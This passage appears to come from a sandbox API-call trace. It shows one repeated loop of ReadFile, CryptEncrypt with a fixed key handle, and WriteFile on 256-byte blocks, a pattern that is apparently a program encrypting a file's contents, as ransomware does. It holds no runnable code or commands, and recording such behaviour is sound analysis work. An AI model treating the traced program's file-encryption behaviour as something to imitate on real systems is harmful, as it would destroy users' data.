pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.589] GetLastError () returned 0x0 [0165.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.589] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.589] GetLastError () returned 0x0 [0165.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.589] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.589] GetLastError () returned 0x0 [0165.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.589] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.589] GetLastError () returned 0x0 [0165.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.589] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.589] GetLastError () returned 0x0 [0165.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.589] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.589] GetLastError () returned 0x0 [0165.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.590] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.590] GetLastError () returned 0x0 [0165.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.590] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.590] GetLastError () returned 0x0 [0165.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.590] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.590] GetLastError () returned 0x0 [0165.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.590] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.590] GetLastError () returned 0x0 [0165.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.590] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.590] GetLastError () returned 0x0 [0165.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.590] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.590] GetLastError () returned 0x0 [0165.590] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.590] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.591] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.591] GetLastError () returned 0x0 [0165.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.591] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.591] GetLastError () returned 0x0 [0165.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.591] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.591] GetLastError () returned 0x0 [0165.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.591] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.591] GetLastError () returned 0x0 [0165.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.591] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.591] GetLastError () returned 0x0 [0165.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.591] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.591] GetLastError () returned 0x0 [0165.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.592] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.592] GetLastError () returned 0x0 [0165.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.592] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.592] GetLastError () returned 0x0 [0165.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.592] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.592] GetLastError () returned 0x0 [0165.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.592] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.592] GetLastError () returned 0x0 [0165.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.592] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.592] GetLastError () returned 0x0 [0165.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.592] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.592] GetLastError () returned 0x0 [0165.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.592] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.592] GetLastError () returned 0x0 [0165.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.593] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.593] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.593] GetLastError () returned 0x0 [0165.593] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.593] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.593] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.593] GetLastError () returned 0x0 [0165.593] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.593] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.593] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.593] GetLastError () returned 0x0 [0165.593] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.593] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.593] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.593] GetLastError () returned 0x0 [0165.593] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.593] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.593] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.593] GetLastError () returned 0x0 [0165.593] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.593] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.593] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.593] GetLastError () returned 0x0 [0165.593] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.593] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.594] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.594] GetLastError () returned 0x0 [0165.594] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.594] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.594] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, 